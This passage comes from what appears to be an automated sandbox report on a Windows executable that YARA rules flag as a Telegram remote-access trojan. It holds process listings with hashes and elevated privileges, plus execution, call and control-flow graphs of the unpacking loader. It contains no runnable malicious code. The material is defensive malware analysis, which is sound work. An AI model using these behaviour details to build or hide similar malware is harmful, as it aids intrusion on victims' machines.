                                                                                                                                                              • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000002.00000002.219197373.00000000005FE000.00000002.00000001.01000000.00000004.sdmp, Author: Joe Security
                                                                                                                                                              Reputation:low
                                                                                                                                                              Has exited:true

                                                                                                                                                              Target ID:3
                                                                                                                                                              Start time:13:40:00
                                                                                                                                                              Start date:01/09/2023
                                                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe
                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                              Commandline:C:\Users\user\Desktop\file.exe" "--multiprocessing-fork" "parent_pid=6860" "pipe_handle=716
                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                              File size:9'737'728 bytes
                                                                                                                                                              MD5 hash:BA25C8AF9DD114244EC83C9F6B0D12EB
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Yara matches:
                                                                                                                                                              • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000003.00000002.219390859.00000000005FE000.00000002.00000001.01000000.00000004.sdmp, Author: Joe Security
                                                                                                                                                              • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000003.00000000.209539589.00000000005FE000.00000002.00000001.01000000.00000004.sdmp, Author: Joe Security
                                                                                                                                                              Reputation:low
                                                                                                                                                              Has exited:true

                                                                                                                                                              Target ID:4
                                                                                                                                                              Start time:13:40:01
                                                                                                                                                              Start date:01/09/2023
                                                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe
                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                              Commandline:C:\Users\user\Desktop\file.exe" "--multiprocessing-fork" "parent_pid=6860" "pipe_handle=636
                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                              File size:9'737'728 bytes
                                                                                                                                                              MD5 hash:BA25C8AF9DD114244EC83C9F6B0D12EB
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Yara matches:
                                                                                                                                                              • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000004.00000000.210593944.00000000005FE000.00000002.00000001.01000000.00000004.sdmp, Author: Joe Security
                                                                                                                                                              • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000004.00000002.219282036.00000000005FE000.00000002.00000001.01000000.00000004.sdmp, Author: Joe Security
                                                                                                                                                              Reputation:low
                                                                                                                                                              Has exited:true

                                                                                                                                                              Target ID:5
                                                                                                                                                              Start time:13:40:01
                                                                                                                                                              Start date:01/09/2023
                                                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe
                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                              Commandline:C:\Users\user\Desktop\file.exe" "--multiprocessing-fork" "parent_pid=6860" "pipe_handle=640
                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                              File size:9'737'728 bytes
                                                                                                                                                              MD5 hash:BA25C8AF9DD114244EC83C9F6B0D12EB
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Yara matches:
                                                                                                                                                              • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000005.00000000.211333071.00000000005FE000.00000002.00000001.01000000.00000004.sdmp, Author: Joe Security
                                                                                                                                                              • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000005.00000002.219304449.00000000005FE000.00000002.00000001.01000000.00000004.sdmp, Author: Joe Security
                                                                                                                                                              Reputation:low
                                                                                                                                                              Has exited:true

                                                                                                                                                              Target ID:6
                                                                                                                                                              Start time:13:40:02
                                                                                                                                                              Start date:01/09/2023
                                                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe
                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                              Commandline:C:\Users\user\Desktop\file.exe" "--multiprocessing-fork" "parent_pid=6860" "pipe_handle=736
                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                              File size:9'737'728 bytes
                                                                                                                                                              MD5 hash:BA25C8AF9DD114244EC83C9F6B0D12EB
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Yara matches:
                                                                                                                                                              • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000006.00000002.219363316.00000000005FE000.00000002.00000001.01000000.00000004.sdmp, Author: Joe Security
                                                                                                                                                              • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000006.00000000.212189614.00000000005FE000.00000002.00000001.01000000.00000004.sdmp, Author: Joe Security
                                                                                                                                                              Reputation:low
                                                                                                                                                              Has exited:true

                                                                                                                                                              Target ID:7
                                                                                                                                                              Start time:13:40:03
                                                                                                                                                              Start date:01/09/2023
                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "ver"
                                                                                                                                                              Imagebase:0x7ff7a8120000
                                                                                                                                                              File size:273'920 bytes
                                                                                                                                                              MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Reputation:high
                                                                                                                                                              Has exited:true

                                                                                                                                                              Target ID:8
                                                                                                                                                              Start time:13:40:03
                                                                                                                                                              Start date:01/09/2023
                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                              Imagebase:0xbf0000
                                                                                                                                                              File size:625'664 bytes
                                                                                                                                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Reputation:high
                                                                                                                                                              Has exited:true

                                                                                                                                                              Target ID:9
                                                                                                                                                              Start time:13:40:03
                                                                                                                                                              Start date:01/09/2023
                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "ver"
                                                                                                                                                              Imagebase:0x7ff7a8120000
                                                                                                                                                              File size:273'920 bytes
                                                                                                                                                              MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Reputation:high
                                                                                                                                                              Has exited:true

                                                                                                                                                              Target ID:10
                                                                                                                                                              Start time:13:40:03
                                                                                                                                                              Start date:01/09/2023
                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                              Imagebase:0x7ff6bab10000
                                                                                                                                                              File size:625'664 bytes
                                                                                                                                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Reputation:high
                                                                                                                                                              Has exited:true

                                                                                                                                                              Reset < >

                                                                                                                                                                Execution Graph

                                                                                                                                                                Execution Coverage:9.9%
                                                                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                Signature Coverage:65.1%
                                                                                                                                                                Total number of Nodes:332
                                                                                                                                                                Total number of Limit Nodes:2
                                                                                                                                                                execution_graph 1740 402040 1741 40223a 1740->1741 1742 4020a7 1740->1742 1742->1741 1742->1742 1743 402181 1742->1743 1744 402309 1742->1744 1745 4022ef _assert 1742->1745 1743->1741 1743->1743 1746 402251 _assert 1743->1746 1744->1743 1747 402349 _assert 1744->1747 1745->1744 1746->1741 1746->1743 1747->1743 1801 406580 1802 4065de 1801->1802 1810 4066d0 1801->1810 1803 406ae0 _assert 1802->1803 1804 406ac0 _assert 1802->1804 1805 40667f 1802->1805 1847 406aff 1803->1847 1804->1803 1844 4066a8 1805->1844 1857 403f60 1805->1857 1806 4066fa memcpy 1806->1844 1809 403f60 _assert 1811 406773 1809->1811 1810->1806 1810->1844 1812 403f60 _assert 1811->1812 1829 40678f 1812->1829 1813 407b38 _assert 1813->1847 1814 402510 13 API calls 1814->1847 1815 406bfa _assert 1815->1847 1816 407a30 _assert 1818 407a60 _assert 1816->1818 1817 407a00 _assert 1817->1816 1821 407a80 1818->1821 1819 4079d0 _assert 1819->1817 1820 407e6c _assert 1820->1847 1822 407a87 _assert 1821->1822 1828 407aa8 _assert 1822->1828 1823 406f00 _assert 1823->1829 1824 407bd0 memcpy 1824->1847 1825 406ca8 memcpy 1825->1818 1825->1847 1826 4074ec _assert 1827 40750f _assert 1826->1827 1826->1847 1827->1847 1828->1822 1829->1823 1834 406df0 _assert 1829->1834 1838 406db0 _assert 1829->1838 1829->1847 1830 40815e _assert 1830->1844 1831 407c68 _assert 1831->1844 1832 4078a0 _assert 1832->1847 1833 40809e 1840 4080b1 _assert 1833->1840 1834->1829 1835 40812b _assert 1835->1830 1836 4078d0 _assert 1841 4078f0 _assert 1836->1841 1837 407544 _assert 1839 407567 _assert 1837->1839 1837->1847 1838->1834 1839->1847 1846 4080ec _assert 1840->1846 1841->1847 1842 40807f _assert 1842->1833 1843 407e3d _assert 1843->1820 1845 407870 _assert 1845->1832 1846->1840 1847->1810 1847->1813 1847->1814 1847->1815 1847->1816 1847->1817 1847->1818 1847->1819 1847->1820 1847->1821 1847->1824 1847->1825 1847->1826 1847->1827 1847->1828 1847->1830 1847->1831 1847->1832 1847->1833 1847->1835 1847->1836 1847->1837 1847->1839 1847->1841 1847->1842 1847->1843 1847->1844 1847->1845 1847->1846 1848 408050 _assert 1847->1848 1849 407840 _assert 1847->1849 1850 4077b0 _assert 1847->1850 1851 407820 _assert 1847->1851 1852 407710 _assert 1847->1852 1853 40761d _assert 1847->1853 1854 4072d4 _assert 1847->1854 1855 4079c0 memcpy 1847->1855 1856 407388 memcpy 1847->1856 1848->1842 1849->1845 1850->1847 1851->1849 1852->1847 1853->1847 1854->1847 1855->1847 1856->1832 1856->1847 1858 404018 _assert 1857->1858 1859 403f8f 1857->1859 1858->1859 1859->1809 1860 409f80 1865 409fcf 1860->1865 1861 40a5d3 1862 40a3c0 _assert 1862->1865 1863 40a318 _assert 1863->1865 1864 40a490 _assert 1864->1864 1864->1865 1865->1861 1865->1862 1865->1863 1865->1864 1866 40a2e0 _assert 1865->1866 1866->1865 1867 403583 memcpy 1868 403120 6 API calls 1867->1868 1869 4035bf 1868->1869 1870 40520b 1889 404f88 1870->1889 1871 40525c memcpy 1872 405610 _assert 1871->1872 1871->1889 1875 405630 _assert 1872->1875 1873 405427 _assert 1873->1889 1874 405718 memcpy 1874->1889 1882 405650 _assert 1875->1882 1876 404e8b 1877 405404 _assert 1877->1873 1877->1889 1878 405730 _assert 1880 40574e _assert 1878->1880 1879 405a25 _assert 1883 405a44 _assert 1879->1883 1881 405770 1880->1881 1881->1880 1882->1889 1883->1889 1884 4055f0 _assert 1884->1872 1885 405b4a _assert 1886 4055d0 _assert 1886->1884 1888 40583c _assert 1888->1889 1889->1870 1889->1871 1889->1872 1889->1873 1889->1874 1889->1875 1889->1876 1889->1877 1889->1878 1889->1879 1889->1881 1889->1882 1889->1883 1889->1884 1889->1885 1889->1886 1889->1888 1890 4055b0 _assert 1889->1890 1891 405b0a _assert 1889->1891 1892 405ac7 1889->1892 1894 405500 _assert 1889->1894 1895 4051bc _assert 1889->1895 1896 402510 1889->1896 1890->1886 1893 405ace _assert 1891->1893 1892->1893 1893->1891 1894->1889 1895->1889 1897 40263e 1896->1897 1898 40253f 1896->1898 1897->1889 1898->1897 1899 4026a0 _assert 1898->1899 1900 402567 1898->1900 1899->1900 1901 402578 1899->1901 1900->1901 1902 402658 _assert 1900->1902 1908 4018b0 1901->1908 1902->1901 1904 402625 1906 4018b0 10 API calls 1904->1906 1906->1897 1907 40260c memcpy 1907->1904 1909 401a58 1908->1909 1910 4018ea 1908->1910 1912 401a61 1909->1912 1913 401ae8 _assert 1909->1913 1911 4018fd 1910->1911 1914 401c30 _assert 1910->1914 1915 401c5d 1911->1915 1926 401910 1911->1926 1928 401919 1911->1928 1916 401e60 _assert 1912->1916 1918 401e20 1912->1918 1919 401a7e 1912->1919 1912->1928 1913->1912 1913->1928 1914->1911 1914->1928 1917 401c7e 1915->1917 1923 401f85 _assert 1915->1923 1916->1917 1927 401fc3 _assert 1917->1927 1917->1928 1918->1916 1920 401f28 _assert _assert 1919->1920 1921 401a9c 1919->1921 1920->1928 1921->1911 1924 401aa5 _assert 1921->1924 1922 401d50 1922->1928 1929 401fe2 _assert 1922->1929 1923->1917 1924->1911 1925 401fa4 _assert 1925->1922 1926->1922 1926->1925 1926->1928 1927->1929 1928->1897 1928->1904 1928->1907 1929->1928 1590 4010ed 1593 40114b 1590->1593 1594 40117f 1593->1594 1595 401240 1594->1595 1596 401234 _amsg_exit 1594->1596 1597 40126f 1595->1597 1598 40124d _initterm 1595->1598 1596->1597 1599 401287 _initterm 1597->1599 1600 4012a7 1597->1600 1598->1597 1599->1600 1609 401576 1600->1609 1602 4013f3 1614 41eb80 1602->1614 1605 401447 1607 401451 _cexit 1605->1607 1608 40110e 1605->1608 1606 40143a exit 1606->1605 1607->1608 1610 40159f 1609->1610 1611 401652 1610->1611 1612 4015ba 1610->1612 1611->1602 1613 4015d9 malloc memcpy 1612->1613 1613->1610 1615 41eb98 1614->1615 1618 41dfe0 1615->1618 1619 41dff9 GetModuleFileNameW 1618->1619 1620 41e016 1619->1620 1621 41e848 GetLastError FormatMessageA 1619->1621 1687 41dcf0 1620->1687 1622 425998 1621->1622 1624 41e88e puts 1622->1624 1636 41e3c1 1624->1636 1626 41e037 SetConsoleCtrlHandler 1629 41e051 CreateDirectoryW CreateFileW 1626->1629 1630 41e557 GetLastError FormatMessageA puts puts 1626->1630 1627 41eaee puts _putws abort 1628 41eb0c 1627->1628 1719 4024e0 1628->1719 1631 41ea0a GetLastError FormatMessageA puts puts 1629->1631 1632 41e0bf SetFilePointer 1629->1632 1633 40142a 1630->1633 1631->1633 1634 41ea67 _assert 1632->1634 1635 41e0df SetFilePointer ReadFile 1632->1635 1633->1605 1633->1606 1647 41ea86 _assert 1634->1647 1640 41e9cc _assert 1635->1640 1641 41e13e 1635->1641 1637 41e6e0 1636->1637 1638 41e474 CreateFileW 1636->1638 1642 41e701 1637->1642 1655 426480 abort 1637->1655 1638->1628 1643 41e4b6 1638->1643 1649 41e9eb _assert 1640->1649 1645 41e97a _assert 1641->1645 1646 41e14c SetFilePointer 1641->1646 1661 41e730 GetCurrentProcessId 1642->1661 1648 41cd30 8 API calls 1643->1648 1644 41eb2d 1657 41eb37 _assert 1644->1657 1654 41e999 1645->1654 1646->1647 1650 41e16b ReadFile 1646->1650 1653 41eaa5 _assert 1647->1653 1656 41e4c9 1648->1656 1649->1631 1651 41e193 1650->1651 1652 41e9ad _assert 1650->1652 1658 41e1a1 1651->1658 1659 41e953 _assert 1651->1659 1652->1640 1665 41eacf _assert 1653->1665 1654->1652 1662 426490 1655->1662 1660 41e4e4 1656->1660 1666 41e549 CloseHandle FindCloseChangeNotification 1656->1666 1668 41cd30 8 API calls 1656->1668 1669 41eb56 1657->1669 1663 41e1ac 1658->1663 1664 41e92c _assert 1658->1664 1659->1658 1659->1663 1660->1666 1716 402370 1661->1716 1662->1662 1670 41e905 _assert 1663->1670 1683 41e1b7 1663->1683 1664->1663 1664->1683 1665->1627 1666->1630 1672 41e50e WriteFile 1668->1672 1669->1655 1673 41e1c2 malloc 1670->1673 1670->1683 1672->1656 1676 41e52a _assert 1672->1676 1673->1657 1677 41e1dc malloc 1673->1677 1674 41e8e6 _assert 1674->1673 1675 41e7ca CloseHandle 1675->1633 1678 41e7fd WaitForSingleObject GetExitCodeProcess 1675->1678 1676->1656 1676->1666 1677->1665 1679 41e1f6 malloc 1677->1679 1680 41e826 CloseHandle 1678->1680 1681 41e81e 1678->1681 1679->1653 1679->1683 1680->1633 1681->1680 1683->1654 1683->1655 1683->1661 1683->1673 1683->1674 1684 41e367 1683->1684 1685 41e61f 1683->1685 1705 41cd30 1683->1705 1684->1636 1684->1655 1684->1685 1685->1669 1686 41e6b9 CreateDirectoryW 1685->1686 1686->1637 1691 41ddb4 1687->1691 1696 41dd15 1687->1696 1688 41dd4f _wcsicmp 1689 41dd73 _wcsicmp 1688->1689 1690 41deb8 GetTempPathW 1688->1690 1692 41dec8 GetCommandLineW CommandLineToArgvW 1689->1692 1693 41dd8a _wcsicmp 1689->1693 1690->1696 1691->1626 1691->1627 1692->1696 1694 41dda1 _wcsicmp 1693->1694 1695 41de80 GetCurrentProcessId 1693->1695 1694->1691 1698 41de20 GetSystemTimeAsFileTime 1694->1698 1697 402370 fputc 1695->1697 1696->1688 1696->1691 1700 41df0d 1696->1700 1701 41dbf0 6 API calls 1696->1701 1702 42647a abort 1696->1702 1697->1696 1699 402370 fputc 1698->1699 1699->1696 1700->1702 1701->1696 1703 426480 abort 1702->1703 1704 426490 1703->1704 1704->1704 1714 41cd70 1705->1714 1706 41ce77 memcpy 1707 41ceac 1706->1707 1706->1714 1707->1683 1709 41cda2 _assert 1710 41cdbc SetFilePointer 1709->1710 1710->1714 1711 41cf18 _assert 1711->1714 1712 41cdfd ReadFile 1713 41cf40 _assert 1712->1713 1712->1714 1714->1706 1714->1709 1714->1710 1714->1711 1714->1712 1715 41ce2d _assert 1714->1715 1722 41bfd0 1714->1722 1715->1714 1726 420210 1716->1726 1736 4201b0 1719->1736 1721 402504 1721->1644 1724 41c02d 1722->1724 1725 41c0a7 1722->1725 1723 41c086 _assert 1723->1725 1724->1723 1724->1725 1725->1714 1727 420235 1726->1727 1728 42025b 1726->1728 1732 42209c 1727->1732 1729 42209c fputc 1728->1729 1731 402388 SetEnvironmentVariableA GetCommandLineW CreateProcessW 1729->1731 1731->1649 1731->1675 1735 4220bb 1732->1735 1733 422a80 1733->1731 1734 4202b0 fputc 1734->1735 1735->1733 1735->1734 1737 4201d3 1736->1737 1738 42209c fputc 1737->1738 1739 4201f7 1738->1739 1739->1721 1757 402b6e _assert 1748 4016d0 GetModuleHandleA 1749 4016f6 LoadLibraryA GetProcAddress GetProcAddress 1748->1749 1750 401738 1748->1750 1749->1750 1758 406070 1759 4060b6 1758->1759 1761 40613f 1758->1761 1760 406330 _assert _assert _assert _assert 1759->1760 1759->1761 1760->1759 1760->1761 1762 403970 1763 4039c0 1762->1763 1767 403990 1762->1767 1772 403120 1763->1772 1765 4039ef 1766 403b68 1765->1766 1765->1767 1768 403a5b 1765->1768 1769 403b90 _assert 1767->1769 1770 4039a4 1767->1770 1782 402c00 1768->1782 1769->1770 1773 403154 memcpy 1772->1773 1774 4031b8 memset 1772->1774 1778 40318f 1773->1778 1777 4031ee 1774->1777 1774->1778 1775 403302 _assert 1775->1777 1776 403330 _assert 1776->1777 1777->1775 1777->1776 1777->1778 1781 403360 1777->1781 1778->1765 1779 4034e0 _assert 1779->1781 1780 4034c0 _assert 1780->1781 1781->1778 1781->1779 1781->1780 1783 402c66 1782->1783 1784 402f6e _assert 1782->1784 1785 402f4f _assert 1783->1785 1787 402f30 _assert 1783->1787 1788 4030d1 1783->1788 1789 402ccc 1783->1789 1786 402f8d _assert 1784->1786 1785->1784 1795 402fc0 1786->1795 1796 402d43 1786->1796 1787->1785 1791 4030ec _assert 1788->1791 1788->1795 1794 402e7e _assert 1789->1794 1789->1796 1790 402dc1 1797 402ef6 _assert 1790->1797 1800 402e6d 1790->1800 1791->1795 1792 403044 1792->1790 1799 40308e _assert 1792->1799 1792->1800 1793 4030ad _assert 1793->1792 1793->1800 1794->1790 1795->1792 1795->1793 1796->1786 1796->1790 1796->1795 1798 402f11 _assert 1796->1798 1797->1790 1798->1787 1799->1790 1800->1770 1930 403d90 1931 403d99 1930->1931 1932 403da6 1931->1932 1934 403c60 1931->1934 1935 403c73 GetProcessId GenerateConsoleCtrlEvent 1934->1935 1936 403caa 1934->1936 1937 403d30 GetLastError FormatMessageA puts puts 1935->1937 1938 403c8b WaitForSingleObject CloseHandle 1935->1938 1939 403cc0 SHFileOperationW 1936->1939 1940 403cb3 1936->1940 1937->1938 1938->1936 1939->1932 1940->1932 1948 403bb0 1949 403c10 _assert _assert 1948->1949 1950 403bdf 1948->1950 1949->1950 1941 401017 1942 401024 1941->1942 1943 401037 __set_app_type 1942->1943 1944 401043 1942->1944 1943->1944 1951 4017bb 1952 401830 _assert 1951->1952 1953 4017fd 1951->1953 1952->1953 1945 40111c 1946 40114b 87 API calls 1945->1946 1947 40113d 1946->1947

                                                                                                                                                                Callgraph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                • Opacity -> Relevance
                                                                                                                                                                • Disassembly available
                                                                                                                                                                callgraph 0 Function_00402040 1 Function_00426140 2 Function_0040A943 3 Function_00408749 4 Function_0040114B 4->1 25 Function_0041F66E 4->25 31 Function_00401576 4->31 44 Function_0041EF10 4->44 92 Function_0041EB80 4->92 96 Function_0041EC84 4->96 118 Function_004262B0 4->118 5 Function_00404B4F 6 Function_00404651 7 Function_00440350 8 Function_00405D55 9 Function_00408B57 10 Function_0041F25D 11 Function_00403E60 12 Function_00403C60 13 Function_00401860 14 Function_00403F60 15 Function_00403562 16 Function_00404162 17 Function_00404B62 18 Function_00401465 19 Function_0040476A 20 Function_0040386B 21 Function_0040466C 22 Function_00440368 23 Function_0041F36F 53 Function_0041EF20 23->53 55 Function_0041F32B 23->55 24 Function_00402B6E 25->10 25->23 30 Function_00420170 25->30 80 Function_0041FEE8 25->80 26 Function_00406070 27 Function_00403970 36 Function_00402C00 27->36 52 Function_00403120 27->52 28 Function_00402370 46 Function_00420210 28->46 29 Function_00409371 32 Function_00409979 33 Function_0041F77A 34 Function_00401000 35 Function_00402400 37 Function_00409D03 38 Function_00409407 39 Function_0040520B 43 Function_00402510 39->43 117 Function_00403DB0 39->117 40 Function_00402B0B 41 Function_0041EC0F 89 Function_00401680 41->89 42 Function_0040A90E 115 Function_004018B0 43->115 45 Function_00426210 47 Function_00426110 45->47 109 Function_0042209C 46->109 48 Function_00440410 49 Function_00401017 49->18 49->33 66 Function_004262C0 49->66 70 Function_0041ECD0 49->70 72 Function_004262D0 49->72 50 Function_0040111C 50->4 51 Function_00404C1D 52->52 53->47 53->53 79 Function_0041FFE4 53->79 105 Function_0041FE98 53->105 54 Function_00404726 98 Function_0041EF8D 55->98 56 Function_0040422D 57 Function_0040382E 58 Function_00408E2F 59 Function_0041CD30 71 Function_0041BFD0 59->71 60 Function_00408533 61 Function_00404B36 62 Function_0040363C 63 Function_0041FD3C 64 Function_004016C0 65 Function_0041FCC0 67 Function_004097C4 68 Function_00402AC7 69 Function_004016D0 73 Function_004037D8 74 Function_004091D8 75 Function_00405DDE 76 Function_00409EE0 77 Function_004024E0 121 Function_004201B0 77->121 78 Function_0041DFE0 78->28 78->59 78->77 84 Function_0041DCF0 78->84 79->65 80->65 81 Function_004010ED 81->4 82 Function_004061F0 83 Function_0040A5F0 84->28 85 Function_0041DBF0 84->85 86 Function_004045F3 87 Function_004038F6 88 Function_004045FC 90 Function_00406580 90->14 90->43 99 Function_00402390 90->99 90->117 91 Function_00409F80 92->78 92->96 93 Function_00426180 93->47 94 Function_00403583 94->52 95 Function_00404A84 96->41 97 Function_00404785 98->53 98->79 98->105 100 Function_00403D90 100->12 101 Function_00440490 102 Function_00440390 103 Function_00409E95 104 Function_00401097 105->63 105->65 106 Function_0040989A 107 Function_0040939B 108 Function_00440398 119 Function_004202B0 109->119 110 Function_00405F9F 111 Function_00409AA0 112 Function_00405FA7 113 Function_00405CAA 114 Function_004049AF 116 Function_00403BB0 120 Function_00404EB2 121->45 121->93 121->109 122 Function_004017BB 123 Function_00404CBF

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 0 41dfe0-41e010 GetModuleFileNameW 2 41e016-41e031 call 41dcf0 0->2 3 41e848-41e89b GetLastError FormatMessageA call 425998 puts 0->3 8 41e037-41e04b SetConsoleCtrlHandler 2->8 9 41eaee-41eb07 puts _putws abort 2->9 10 41e8a8-41e8ab 3->10 12 41e051-41e0b9 CreateDirectoryW CreateFileW 8->12 13 41e557-41e5aa GetLastError FormatMessageA puts * 2 8->13 11 41eb0c-41eb32 call 4024e0 call 4259f0 9->11 14 41e8b1 10->14 15 41e434-41e43b 10->15 49 41eb37-41eb4b _assert 11->49 16 41ea0a-41ea62 GetLastError FormatMessageA puts * 2 12->16 17 41e0bf-41e0d9 SetFilePointer 12->17 18 41e5af-41e5c2 13->18 20 41e461-41e46e 14->20 19 41e449-41e45f 15->19 16->18 22 41ea67-41ea7b _assert 17->22 23 41e0df-41e138 SetFilePointer ReadFile 17->23 19->20 24 41e440-41e443 19->24 25 41e6e0-41e6ff 20->25 26 41e474-41e4b0 CreateFileW 20->26 36 41ea86-41ea9a _assert 22->36 28 41e9cc-41e9e0 _assert 23->28 29 41e13e-41e146 23->29 24->19 30 41e711-41e722 25->30 31 41e701 25->31 26->11 32 41e4b6-41e4e2 call 41cd30 26->32 40 41e9eb-41e9ff _assert 28->40 34 41e97a-41e98e _assert 29->34 35 41e14c-41e165 SetFilePointer 29->35 37 41e724-41e726 30->37 39 41e708-41e70b 30->39 31->37 52 41e4f5-41e528 call 41cd30 WriteFile 32->52 53 41e4e4 32->53 46 41e999-41e9a5 34->46 35->36 42 41e16b-41e18d ReadFile 35->42 45 41eaa5-41eac4 _assert 36->45 54 41e730-41e7c4 GetCurrentProcessId call 402370 SetEnvironmentVariableA GetCommandLineW CreateProcessW 37->54 39->30 47 426480-426485 abort 39->47 40->16 43 41e193-41e19b 42->43 44 41e9ad-41e9c1 _assert 42->44 50 41e1a1-41e1a6 43->50 51 41e953-41e972 _assert 43->51 44->28 59 41eacf-41eae3 _assert 45->59 46->44 55 426490 47->55 63 41eb56 49->63 57 41e1ac-41e1b1 50->57 58 41e92c-41e94b _assert 50->58 56 41e978 51->56 51->57 72 41e4f0-41e4f3 52->72 73 41e52a-41e547 _assert 52->73 60 41e549-41e552 CloseHandle FindCloseChangeNotification 53->60 54->40 71 41e7ca-41e7f7 CloseHandle 54->71 55->55 56->58 64 41e905-41e924 _assert 57->64 65 41e1b7-41e1bc 57->65 58->65 68 41e951 58->68 59->9 60->13 63->47 69 41e1c2-41e1d6 malloc 64->69 74 41e92a 64->74 65->69 70 41e8e6-41e900 _assert 65->70 68->64 69->49 75 41e1dc-41e1f0 malloc 69->75 70->69 71->18 76 41e7fd-41e81c WaitForSingleObject GetExitCodeProcess 71->76 72->52 72->60 73->52 73->60 74->70 75->59 77 41e1f6-41e206 malloc 75->77 78 41e826-41e83e CloseHandle 76->78 79 41e81e 76->79 77->45 80 41e20c-41e2a8 77->80 78->18 79->78 80->46 81 41e2ae-41e2f7 80->81 83 41e304-41e31f call 41cd30 81->83 86 41e321-41e32e 83->86 87 41e300 83->87 86->54 88 41e334-41e349 86->88 87->83 89 41e350-41e354 88->89 90 41e5c8-41e5eb 89->90 91 41e35a-41e365 89->91 92 41e5f9-41e60a 90->92 93 41e5ed 90->93 91->89 94 41e367-41e383 91->94 95 41e60c-41e619 92->95 98 41e5f0-41e5f3 92->98 93->95 96 41e385 94->96 97 41e399-41e3aa 94->97 100 41e8da 95->100 101 41e61f-41e62b 95->101 99 41e3ac-41e3bb 96->99 97->99 102 41e390-41e393 97->102 98->47 98->92 104 41e3c1-41e3cd 99->104 105 41e8c0 99->105 100->70 103 41e630-41e63c 101->103 102->47 102->97 103->103 106 41e63e-41e669 103->106 107 41e3d0-41e3dc 104->107 108 41e8cc-41e8cf 105->108 106->108 113 41e66f 106->113 107->107 110 41e3de-41e40b 107->110 111 41e8d5 108->111 112 41e68c-41e693 108->112 110->10 117 41e411 110->117 115 41e6b9-41e6d6 CreateDirectoryW 111->115 118 41e6a1-41e6b7 112->118 116 41e670-41e67c 113->116 115->25 116->116 120 41e67e-41e681 116->120 121 41e418-41e424 117->121 118->115 119 41e698-41e69b 118->119 119->63 119->118 120->115 122 41e683-41e686 120->122 121->121 123 41e426-41e429 121->123 122->112 123->20 124 41e42b-41e42e 123->124 124->15
                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.234542689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000000.00000002.234535818.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.234552756.0000000000428000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.234560655.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.234568049.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
